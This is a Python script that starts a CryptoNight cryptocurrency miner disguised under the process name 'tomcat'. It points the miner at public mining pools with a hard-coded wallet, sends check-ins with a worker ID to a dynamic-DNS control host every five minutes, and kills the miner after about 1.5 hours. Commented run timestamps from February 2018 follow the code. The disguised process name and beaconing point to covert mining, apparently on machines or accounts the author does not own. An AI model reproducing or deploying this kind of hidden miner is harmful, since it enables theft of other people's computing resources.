import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:24:05.236321
#2018-02-17 16:11:05.032967
#2018-02-17 17:58:06.342088
#2018-02-17 19:46:02.186990
#2018-02-17 21:35:03.979545
#2018-02-17 23:19:01.566954
#2018-02-18 01:07:05.886775
#2018-02-18 02:54:01.334110
#2018-02-18 04:43:05.242735
#2018-02-18 06:35:01.735227
#2018-02-18 08:22:06.454004
#2018-02-18 10:10:08.696841
#2018-02-18 11:56:03.571960
#2018-02-18 13:41:04.353546
#2018-02-18 15:32:01.611952
#2018-02-18 17:20:08.263385
#2018-02-18 19:09:06.415343
#2018-02-18 20:56:01.644505
#2018-02-18 22:42:04.347441
#2018-02-19 00:31:07.148036
#2018-02-19 02:16:06.782206
#2018-02-19 04:03:07.241666
#2018-02-19 05:47:02.034362
#2018-02-19 07:34:01.915542
#2018-02-19 09:24:05.829784
#2018-02-19 11:13:01.327759
#2018-02-19 13:01:02.060665
#2018-02-19 14:48:06.709504
#2018-02-19 16:36:07.609689
#2018-02-19 18:22:04.513509
#2018-02-19 20:08:09.216225
#2018-02-19 21:57:07.775615
#2018-02-19 23:42:01.828661
#2018-02-20 01:29:04.709641
#2018-02-20 03:18:04.146753
#2018-02-20 05:04:07.297607
#2018-02-20 06:47:06.224078
#2018-02-20 08:34:06.831929
#2018-02-20 10:18:08.877658
#2018-02-20 12:03:06.205137
#2018-02-20 13:49:13.508617
#2018-02-20 15:33:07.864085
#2018-02-20 17:20:01.416231
#2018-02-20 19:09:05.544884
#2018-02-20 20:57:07.544230
#2018-02-20 22:43:06.575228
#2018-02-21 00:26:05.129698
#2018-02-21 02:12:07.451734
#2018-02-21 03:59:03.621127
#2018-02-21 05:46:01.409197
#2018-02-21 07:34:14.668555
#2018-02-21 09:19:03.791943
#2018-02-21 11:07:08.478448
#2018-02-21 12:54:05.607489
#2018-02-21 14:43:05.633433
#2018-02-21 16:32:04.871201
#2018-02-21 18:21:02.046984
#2018-02-21 20:06:06.283088
#2018-02-21 21:55:08.490504
#2018-02-21 23:43:08.351817
#2018-02-22 01:33:06.208150
#2018-02-22 03:20:07.069655
#2018-02-22 05:08:04.178882
#2018-02-22 06:51:01.462491
#2018-02-22 08:38:08.149585
#2018-02-22 10:25:07.606355
#2018-02-22 12:11:01.332985
#2018-02-22 13:57:08.246670
#2018-02-22 15:45:01.435894
#2018-02-22 17:32:01.398241
#2018-02-22 19:18:08.602609
#2018-02-22 21:11:06.398341
#2018-02-22 22:55:01.545091
#2018-02-23 00:41:05.334085
#2018-02-23 02:27:03.732495
#2018-02-23 04:16:08.670253
#2018-02-23 06:03:06.513555
#2018-02-23 07:48:05.888876
#2018-02-23 09:48:06.882944
#2018-02-23 11:53:08.086167
#2018-02-23 13:42:05.125478
#2018-02-23 15:29:06.939466
#2018-02-23 17:19:02.164569
#2018-02-23 19:05:09.852416
#2018-02-23 20:52:04.217423
#2018-02-23 22:38:03.843871
#2018-02-24 00:24:08.721740
#2018-02-24 02:15:06.803926
#2018-02-24 04:06:04.920249
#2018-02-24 05:53:01.936591
#2018-02-24 07:41:06.340671
#2018-02-24 09:26:07.478510
#2018-02-24 11:20:07.986181
#2018-02-24 13:09:06.487231
#2018-02-24 14:59:07.186905
#2018-02-24 16:49:03.393684
#2018-02-24 18:37:07.118038
#2018-02-24 20:28:06.921468
#2018-02-24 22:25:01.427218
#2018-02-25 01:34:04.994411
#2018-02-25 04:56:05.992242
#2018-02-25 09:28:01.233534